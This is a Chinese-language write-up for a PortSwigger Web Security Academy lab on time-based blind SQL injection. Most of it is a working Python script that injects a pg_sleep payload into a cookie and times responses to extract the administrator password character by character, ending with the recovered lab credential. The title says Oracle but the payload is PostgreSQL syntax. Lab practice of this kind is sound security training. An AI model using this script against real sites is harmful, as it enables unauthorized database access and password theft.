burpsuite靶场----SQL注入15----oracle的时间盲注
burpsuite靶场----SQL注入15----oracle的时间盲注
靶场地址
https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval
正式开始
这个和之前的oracle的布尔盲注差不多
https://www.cnblogs.com/thebeastofwar/p/17640741.html
稍微改一下脚本,因为这个是https的,所以延迟时间最好长一些,以获得较为准确的数据
payload部分
payload="'||(select case when (username='administrator' and substr(password,{},1)='{}') then pg_sleep(2) else pg_sleep(0) end from users)--".format(str(num),i)
import requests
import urllib3
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://0a660029041f82548060cb95000c0033.web-security-academy.net'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
'Te': 'trailers'
}
dict='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#'
num=1
flag=''
while True:
for i in dict:
print(i)
if i=='#':
break
payload="'||(select case when (username='administrator' and substr(password,{},1)='{}') then pg_sleep(10) else pg_sleep(0) end from users)--".format(str(num),i)
cookies={'TrackingId':'BU622TbcJXbso7Ww'+payload,'session':'3woEmftDu9hFUPzEt7girIRPW5D8eICf'}
print(cookies['TrackingId'])
start=time.time()
response = requests.get(url,headers=headers,cookies=cookies,verify=False)
end=time.time()
diff=end-start
if diff>=10:
print('good')
flag+=i
num+=1
break
print(flag)
if i=='#':
break
print('成功获取密码:'+flag)
administrator xshsvj8t64hjll8spjfe 登录
